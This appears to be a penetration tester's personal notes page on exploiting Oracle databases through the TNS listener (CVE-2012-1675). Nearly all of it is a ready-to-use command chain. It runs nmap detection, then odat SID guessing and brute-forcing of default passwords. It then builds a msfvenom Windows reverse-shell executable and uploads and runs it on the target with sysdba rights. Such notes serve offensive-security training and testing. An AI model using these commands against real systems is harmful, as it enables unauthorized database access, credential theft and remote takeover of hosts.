Oracle exploitation:

tools https://github.com/bongbongco/CVE-2012-1675

nmap -Pn -sT --script=./oracle-tns-poison -p 1521 IP

If it's vuln, use odat

  1. oda.py sidguesser -s IP -p 1521

  2. double check if the system is vuln (if the username is XE) 

python3 odat.py tnspoison -s IP -d XE --test-modul

3. obtain creds

python3 odat.py passwordguesser -s IP -p 1521 --accounts-file oracle_default_userpass.txt -d XE

4. once you find creds, you can now upload malicious files!

generate it with msfvenom: 

msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=1234 -f exe > gori.exe

Upload with odat.py 

python3 odat.py utilfile -s IP -d XE -U USERNAME -P PASSWORD --sysdba -putfile C:/ gori.exe ./gori.exe

Execute the file: 

python3 odat.py externaltable -s IP -d XE -U USERNAME -P PASSWORD --sysdba -exec C:/ gori.exe
PreviousMemory DumpNextNotes

Last updated